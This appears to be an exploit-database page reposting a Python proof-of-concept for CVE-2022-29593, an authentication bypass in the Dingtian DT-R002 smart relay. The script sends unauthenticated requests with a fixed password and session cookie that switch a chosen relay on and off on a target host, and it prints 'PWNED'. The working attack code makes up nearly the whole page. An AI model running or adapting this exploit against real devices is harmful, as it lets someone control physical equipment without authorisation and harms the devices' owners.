Dingtian-DT-R002 3.1.276A Authentication Bypass
CVE
Category
Price
Severity
CVE-2022-29593
CWE-294
$500
Critical
Author
Risk
Exploitation Type
Date
Unknown
High
Remote
2022-08-02
CPE
cpe:cpe:/a:dingtian:dt-r002:3.1.276a
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022080021 Below is a copy:
Dingtian-DT-R002 3.1.276A Authentication Bypass # Exploit Title: Dingtian-DT-R002 3.1.276A - Authentication Bypass
# Google Dork: NA
# Date: 13th July 2022
# Exploit Author: Victor Hanna (Trustwave SpiderLabs)
# Author Github Page: https://9lyph.github.io/CVE-2022-29593/
# Vendor Homepage: https://www.dingtian-tech.com/en_us/relay4.html
# Software Link: https://www.dingtian-tech.com/en_us/support.html?tab=download
# Version: V3.1.276A
# Tested on: MAC OSX
# CVE : CVE-2022-29593#!/usr/local/bin/python3
# Author: Victor Hanna (SpiderLabs)
# DingTian DT-R002 2CH Smart Relay
# CWE-294 - Authentication Bypass by Capture-replay
import requests
import re
import urllib.parse
from colorama import init
from colorama import Fore, Back, Style
import sys
import os
import time
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
def banner():
print ("[+]********************************************************************************[+]")
print ("| Author : Victor Hanna (9lyph)["+Fore.RED + "SpiderLabs" +Style.RESET_ALL+"]\t\t\t\t\t |")
print ("| Description: DingTian DT-R002 2CH Smart Relay |")
print ("| Usage : "+sys.argv[0]+" <host> <relay#> |")
print ("[+]********************************************************************************[+]")
def main():
os.system('clear')
banner()
urlRelay1On = "http://"+host+"/relay_cgi.cgi?type=0&relay=0&on=1&time=0&pwd=0&"
urlRelay1Off = "http://"+host+"/relay_cgi.cgi?type=0&relay=0&on=0&time=0&pwd=0&"
urlRelay2On = "http://"+host+"/relay_cgi.cgi?type=0&relay=1&on=1&time=0&pwd=0&"
urlRelay2Off = "http://"+host+"/relay_cgi.cgi?type=0&relay=1&on=0&time=0&pwd=0&"
headers = {
"Host": ""+host+"",
"User-Agent": "9lyph/3.0",
"Accept": "*/*",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"DNT": "1",
"Connection": "close",
"Referer": "http://"+host+"/relay_cgi.html",
"Cookie": "session=4463009"
}
print (Fore.YELLOW + f"[+] Exploiting" + Style.RESET_ALL, flush=True, end=" ")
for i in range(5):
time.sleep (1)
print (Fore.YELLOW + "." + Style.RESET_ALL, flush=True, end="")
try:
if (relay == "1"):
print (Fore.GREEN + "\n[+] Relay 1 switched on !" + Style.RESET_ALL)
r = requests.get(urlRelay1On)
time.sleep (5)
print (Fore.GREEN + "[+] Relay 1 switched off !" + Style.RESET_ALL)
r = requests.get(urlRelay1Off)
print (Fore.YELLOW + "PWNED !!!" + Style.RESET_ALL, flush=True, end="")
elif (relay == "2"):
print (Fore.GREEN + "[+] Relay 2 switched on !" + Style.RESET_ALL)
r = requests.get(urlRelay2On)
time.sleep (5)
print (Fore.GREEN + "[+] Relay 2 switched on !" + Style.RESET_ALL)
r = requests.get(urlRelay2Off)
print (Fore.YELLOW + "PWNED !!!" + Style.RESET_ALL, flush=True, end="")
else:
print (Fore.RED + "[!] No such relay" + Style.RESET_ALL)
except KeyboardInterrupt:
sys.exit(1)
except requests.exceptions.Timeout:
print ("[!] Connection to host timed out !")
sys.exit(1)
except requests.exceptions.Timeout:
print ("[!] Connection to host timed out !")
sys.exit(1)
except Exception as e:
print (Fore.RED + f"[+] You came up short I\'m afraid !" + Style.RESET_ALL)
if __name__ == "__main__":
if len(sys.argv)>2:
host = sys.argv[1]
relay = sys.argv[2]
main ()
else:
print (Fore.RED + f"[+] Not enough arguments, please specify target and relay!" + Style.RESET_ALL)
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum